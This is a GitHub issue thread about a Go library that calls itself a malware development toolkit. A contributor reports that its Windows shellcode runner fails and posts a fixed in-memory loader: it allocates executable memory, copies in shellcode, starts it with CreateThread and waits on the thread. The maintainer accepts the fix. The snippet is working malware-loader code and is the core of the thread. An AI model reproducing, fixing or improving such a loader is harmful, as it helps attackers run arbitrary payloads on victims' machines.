redcode-labs / Coldfire

Golang malware development library
MIT License

runShellcode broken (Windows) #38

Closed elusivethreat closed 5 months ago

elusivethreat commented 5 months ago

Tested an sRDI shellcode payload with the coldfire.runShellcode() function and it fails to execute the shellcode correctly.

Looking at the source for the function, it appears the issue lies with CreateThread being called without WaitForSingleObject afterwards. I added the WaitForSingleObject API call and tested the payload, and it seemed to fix the issue.

```go
// ColdFire implementation (as posted, with the WaitForSingleObject call added)
var bg_run uintptr = 0x00
kernel32 := syscall.MustLoadDLL("kernel32.dll")
VirtualAlloc := kernel32.MustFindProc("VirtualAlloc")
procCreateThread := kernel32.MustFindProc("CreateThread")
waitForSingleObject := kernel32.MustFindProc("WaitForSingleObject")
// MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x2000|0x1000, syscall.PAGE_EXECUTE_READWRITE)
ptr := (*[990000]byte)(unsafe.Pointer(addr))
for i, value := range shellcode {
    ptr[i] = value
}
threadHandle, _, _ := procCreateThread.Call(0, 0, addr, 0, bg_run, 0)
// Block until the thread finishes; ^uint(0) is INFINITE. Without this the
// caller returns (and may exit) before the new thread has run.
waitForSingleObject.Call(threadHandle, uintptr(^uint(0)))
```

unrooted commented 5 months ago

seems fixed with 07d7928002d6c884610acbae393934f07027cc3c

thank you for your contrib!